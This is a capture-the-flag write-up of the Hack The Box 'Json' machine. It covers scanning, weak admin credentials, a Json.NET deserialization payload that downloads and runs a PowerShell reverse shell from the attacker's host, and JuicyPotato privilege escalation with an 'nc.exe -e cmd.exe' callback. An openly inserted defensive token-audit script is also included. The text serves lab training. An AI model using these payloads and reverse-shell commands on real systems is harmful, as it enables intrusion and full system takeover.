Basic Scan

The Nmap results show that three services have open ports: FTP, web (HTTP) and SMB.

~/Documents/HTB/Json root@kali
❯ cat nmap.txt
# Nmap 7.80 scan initiated Sat Feb 8 10:18:41 2020 as: nmap -sC -sV -oN nmap.txt 10.10.10.158
Nmap scan report for 10.10.10.158
Host is up (0.24s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
|_nbstat: NetBIOS name: JSON, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:f4:fa (VMware)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-02-08T06:20:25
|_ start_date: 2020-02-08T03:46:10

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 8 10:20:33 2020 -- 1 IP address (1 host up) scanned in 112.34 seconds

Confirm Target

On port 21 the anonymous user is asked for a password, and the SMB service likewise requires a password. So the first target is port 80.

~/Documents/HTB/Json root@kali
❯ smbclient -L 10.10.10.158
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_ACCESS_DENIED

~/Documents/HTB/Json root@kali 7s
❯ ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.158:root): anonymous
331 Password required for anonymous
Password:
530 Login or password incorrect!
Login failed.
Remote system type is UNIX.
ftp>

User.txt

Open Burp Suite and browse to the site. Logging in with the weak credentials admin:admin succeeds, and at the same time we notice an unusual field in the request headers: Bearer.

GET /api/Account/ HTTP/1.1
Host: 10.10.10.158
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.158/index.html
Bearer: eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=
Connection: close
Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=

Judging by its form, the value is Base64-encoded; decoding it yields the admin user's account record, password field included. Trying these credentials against FTP and SMB did not work for either.

~/Documents/HTB/Json root@kali 11m 3s
❯ echo -n 'eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=' | base64 -d
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}

Send the request to Repeater and test the Bearer header for a deserialization vulnerability. Encoding an arbitrary string as base64 and sending it to the server in a GET request gives the result below: the server parsed the content of our request header.

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Sat, 08 Feb 2020 14:04:35 GMT
Connection: close
Content-Length: 339

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Bad Request</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Bad Request - Invalid Header</h2>
<hr><p>HTTP Error 400. The request has an invalid header name.</p>
</BODY></HTML>

Exploit it with [ysoserial.net]. Because its default run command goes through cmd.exe, calling PowerShell from there to perform the download involves a lot of single- and double-quote escaping and is error-prone, so the generated code was changed to invoke powershell directly, which downloads and runs the reverse-shell ps1 script.

~/Documents/HTB/Json root@kali
❯ cat reshell.code
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['powershell', '-Command IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.164:8000/reshell.ps1\')']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
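As an added defensive example (not code from the original writeup or from ysoserial.net), the Python audit below covers both findings a reviewer would raise about this API: the Bearer value is plain base64 JSON with no signature segment, carrying a password field and a client-controlled role claim, and any Json.NET `$type` hint inside it can be detected and rejected before the data ever reaches a polymorphic deserializer. The injected sample is constructed here and uses only the gadget type name already shown in reshell.code above.

```python
import base64
import json

# Session token captured in the request above: base64 of a plain JSON object.
PAGE_TOKEN = "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0="
# Constructed detection sample: a token that smuggles a Json.NET type hint (type name taken from reshell.code).
INJECTED_TOKEN = base64.b64encode(json.dumps(
    {"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework"}).encode()).decode()
SENSITIVE_KEYS = {"password", "pwd", "secret", "hash"}
ROLE_KEYS = {"rol", "role", "roles", "isadmin"}

def decode_token(token):
    """Base64-decode (tolerating missing '=' padding) and parse as JSON; None on any failure."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        return json.loads(raw.decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        return None

def find_type_hints(node, found=None):
    """Collect every Json.NET '$type' value, however deeply nested, before deserialization."""
    found = [] if found is None else found
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "$type" and isinstance(value, str):
                found.append(value)
            find_type_hints(value, found)
    elif isinstance(node, list):
        for item in node:
            find_type_hints(item, found)
    return found

def audit_token(token):
    """Report why a token of this shape must not be trusted as-is or fed to a type-resolving deserializer."""
    obj = decode_token(token)
    report = {"parsed": isinstance(obj, dict),
              # A JWS/JWT is header.payload.signature; a bare base64 blob has no signature segment at all.
              "has_signature_segment": token.count(".") == 2,
              "type_hints": [], "sensitive": [], "role_claims": []}
    if report["parsed"]:
        report["type_hints"] = find_type_hints(obj)
        report["sensitive"] = sorted(k for k in obj if k.lower() in SENSITIVE_KEYS)
        report["role_claims"] = sorted(k for k in obj if k.lower() in ROLE_KEYS)
    # Unparseable input or any '$type' hint: reject before the application deserializer sees it.
    report["reject"] = not report["parsed"] or bool(report["type_hints"])
    return report
```

The same walk over `$type` keys is what a server-side SerializationBinder or a TypeNameHandling.None setting enforces at the deserializer; the audit here shows the check as a standalone gate on the header value.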

Base64-encode the code above [to fit it on one screen here, the newlines were not stripped out]

~/Documents/HTB/Json root@kali
❯ base64 reshell.code
[base64 output omitted]

Start a simple web server with python3, place the malicious ps1 in that directory, and send the request to the server.

GET /api/Account/ HTTP/1.1
Host: 10.10.10.158
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.158/index.html
Bearer: [base64 of reshell.code, omitted]
Connection: close
Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=
Cache-Control: max-age=0

Listen on the port with nc and obtain user.txt

~/Documents/HTB/Json root@kali
❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52223
Windows PowerShell running as user JSON$ on JSON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>^C

~/Documents/HTB/Json root@kali 12m 9s
❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52281
Windows PowerShell running as user JSON$ on JSON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>cd C:\users
PS C:\users> dir


Directory: C:\users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 5/22/2019 4:52 PM .NET v2.0
d---- 5/22/2019 4:52 PM .NET v2.0 Classic
d---- 5/22/2019 4:52 PM .NET v4.5
d---- 5/22/2019 4:52 PM .NET v4.5 Classic
d---- 5/22/2019 4:52 PM Classic .NET AppPool
d-r-- 8/22/2013 11:39 AM Public
d---- 5/22/2019 5:37 PM superadmin
d---- 2/8/2020 8:37 AM userpool


PS C:\users> cd userpool
PS C:\users\userpool> dir


Directory: C:\users\userpool


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r-- 5/22/2019 5:07 PM Contacts
d-r-- 5/22/2019 5:07 PM Desktop
d-r-- 5/22/2019 5:07 PM Documents
d-r-- 5/22/2019 5:07 PM Downloads
d-r-- 5/22/2019 5:07 PM Favorites
d-r-- 5/22/2019 5:07 PM Links
d---- 2/8/2020 8:01 AM Microsoft
d-r-- 5/22/2019 5:07 PM Music
d-r-- 5/22/2019 5:07 PM Pictures
d-r-- 5/22/2019 5:07 PM Saved Games
d-r-- 5/22/2019 5:07 PM Searches
d-r-- 5/22/2019 5:07 PM Videos

PS C:\users\userpool> cd desktop
PS C:\users\userpool\desktop> dir


Directory: C:\users\userpool\desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 5/22/2019 5:07 PM 32 user.txt


PS C:\users\userpool\desktop> type user.txt
34459a01f50050dc410db09bfb9f52bb
PS C:\users\userpool\desktop>

Root.txt

Checking the current account's privileges shows that it holds SeImpersonatePrivilege. Use [juicy-potato] to escalate privileges.

PS C:\users\userpool\desktop> whoami /all

USER INFORMATION
----------------

User Name SID
============= =============================================
json\userpool S-1-5-21-1325271270-1453780805-384807897-1004


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
==================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\Json.Net Well-known group S-1-5-82-1097026443-1840990353-1306629843-3865948041-3469430407 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Confirm the OS version: Windows Server 2012 R2

PS C:\users\userpool> systeminfo

Host Name: JSON
OS Name: Microsoft Windows Server 2012 R2 Datacenter
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-80005-00001-AA602
Original Install Date: 5/22/2019, 4:27:16 PM
System Boot Time: 2/7/2020, 10:45:54 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 4/5/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: es-mx;Spanish (Mexico)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 6,143 MB
Available Physical Memory: 5,021 MB
Virtual Memory: Max Size: 7,807 MB
Virtual Memory: Available: 6,547 MB
Virtual Memory: In Use: 1,260 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.158
[02]: fe80::f59a:5ad4:1e60:d4c9
[03]: dead:beef::f59a:5ad4:1e60:d4c9
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\users\userpool>

Use the [List] and [Test.bat] from that project to determine which CLSIDs are usable.

PS C:\users\userpool> type result.log
{9678f47f-2435-475c-b24a-4606f8161c16};JSON\userpool
{98068995-54d2-4136-9bc9-6dbcb0a4683f};JSON\userpool
{0289a7c5-91bf-4547-81ae-fec91a89dec5};JSON\userpool
{9acf41ed-d457-4cc1-941b-ab02c26e4686};JSON\userpool
{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\SYSTEM
{1BE1F766-5536-11D1-B726-00C04FB926AF};NT AUTHORITY\LOCAL SERVICE
{5BF9AA75-D7FF-4aee-AA2C-96810586456D};NT AUTHORITY\LOCAL SERVICE
{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\LOCAL SERVICE
{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\SYSTEM
{8BC3F05E-D86B-11D0-A075-00C04FB68820};NT AUTHORITY\SYSTEM
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
PS C:\users\userpool>

Upload nc and JuicyPotato.exe to the target, write the nc reverse shell into a batch file, and run the command as described in the tutorial. This yields a root shell.

C:\users\userpool>type rev5.bat
type rev5.bat
C:\Users\userpool\nc.exe -e cmd.exe 10.10.14.164 1337

C:\users\userpool>JuicyPotato.exe -t * -p C:\users\userpool\rev5.bat -l 1337 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -t * -p C:\users\userpool\rev5.bat -l 1337 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 1337
....
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

C:\users\userpool>

Got Root.txt

~/Documents/HTB/Json root@kali
❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52336
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\users\superadmin
cd C:\users\superadmin

C:\Users\superadmin>cd desktop
cd desktop

C:\Users\superadmin\Desktop>type root.txt
type root.txt
3cc85d1bed2ee84af4074101b991d441
C:\Users\superadmin\Desktop>